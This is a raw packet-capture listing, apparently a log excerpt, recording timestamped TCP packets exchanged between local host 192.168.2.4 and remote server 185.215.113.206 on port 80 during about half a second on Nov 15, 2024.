Nov 15, 2024 14:09:28.201380968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.201404095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.201419115 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.202192068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.202203035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.202210903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.202219963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.202245951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.202274084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.202920914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.202930927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.202939034 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.202974081 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.202991962 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.203686953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.203699112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.203706026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.203717947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.203741074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.203758955 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.204446077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.204457998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.204492092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.204493999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.204503059 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.204504013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.204540968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.205133915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205147028 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205157042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205167055 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205214024 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.205246925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.205673933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205691099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205698967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205709934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.205728054 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.205751896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.206357002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.206370115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.206378937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.206392050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.206406116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.206424952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.207326889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.207339048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.207348108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.207360983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.207370043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.207381010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.207405090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.208409071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.208420992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.208430052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.208440065 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.208460093 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.208477020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.209405899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.209417105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.209427118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.209438086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.209448099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.209479094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.209521055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.210608959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.210621119 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.210630894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.210642099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.210655928 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.210685968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.211608887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.211622000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.211632013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.211641073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.211647987 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.211652040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.211668968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.211685896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.212898016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.212922096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.212932110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.212943077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.212960958 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.212996006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.213757992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.213771105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.213782072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.213792086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.213800907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.213800907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.213824034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.213839054 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.214601040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.214612961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.214622974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.214633942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.214654922 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.214680910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.215178013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.215190887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.215199947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.215209961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.215218067 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.215223074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.215248108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.215272903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.216078997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216090918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216099977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216115952 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216136932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.216152906 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.216854095 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216866016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216875076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216886997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216896057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.216903925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.216926098 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.216933966 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.217531919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.217545033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.217581987 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.218144894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.218158007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.218184948 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.218205929 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.218899965 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.218910933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.218947887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.219754934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.219767094 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.219775915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.219809055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.219825983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.220288992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.220300913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.220336914 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.220755100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.220767975 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.220794916 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.220819950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.221015930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.221029043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.221062899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.221306086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.221318960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.221328974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.221338987 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.221347094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.221374989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.222255945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.222268105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.222279072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.222291946 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.222321033 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.223125935 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223138094 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223146915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223157883 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223182917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.223201036 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.223822117 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223834991 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223845959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223856926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.223872900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.223890066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.224756956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.224771023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.224781990 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.224793911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.224803925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.224811077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.224831104 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.224850893 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.225696087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.225708961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.225719929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.225730896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.225737095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.225760937 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.226810932 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.226824045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.226833105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.226844072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.226850033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.226856947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.226890087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.227931023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.227941990 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.227951050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.227977991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.227993965 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.228450060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.228461027 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.228471041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.228482962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.228497028 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.228521109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.229408979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.229420900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.229430914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.229441881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.229450941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.229454041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.229485989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.230318069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230330944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230340958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230351925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230360985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230367899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.230384111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.230407953 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.230880022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230892897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230901957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230911970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.230927944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.230945110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.231595993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.231609106 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.231617928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.231628895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.231636047 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.231637955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.231664896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.231681108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.232683897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.232695103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.232703924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.232713938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.232738972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.232760906 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.233699083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.233711004 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.233721018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.233731985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.233741045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.233747959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.233789921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.234674931 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.234687090 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.234697104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.234724045 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.234724998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.234735966 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.234761953 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.235522032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.235534906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.235544920 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.235554934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.235564947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.235569000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.235595942 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.235611916 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.236515999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.236526966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.236536980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.236546993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.236569881 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.236587048 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.237404108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.237451077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.341552019 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.358834982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632200956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632289886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.632354021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632366896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632414103 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.632414103 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.632853985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632867098 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632877111 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632888079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.632901907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.632924080 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.632971048 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.633662939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.633676052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.633687019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.633697987 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.633711100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.633737087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.633738041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.633871078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.634733915 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.634819984 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.634849072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.634859085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.634881020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.634896994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.634939909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.634939909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.635778904 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.635814905 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.635849953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.635865927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.635865927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.635895014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.635929108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.635935068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.635935068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.636096954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.637211084 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.637248993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.637263060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.637284994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.637331009 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.637331009 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.637372017 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.637415886 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.637849092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.637886047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.637926102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.637926102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.638020039 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.638056040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.638089895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.638138056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.638138056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.638802052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.638937950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.638993025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639029026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639044046 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.639064074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639106035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.639106035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.639672995 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639708996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639744043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639753103 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.639753103 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.639779091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639813900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.639822006 CET	49752	80	192.168.2.4	185.215.113.206
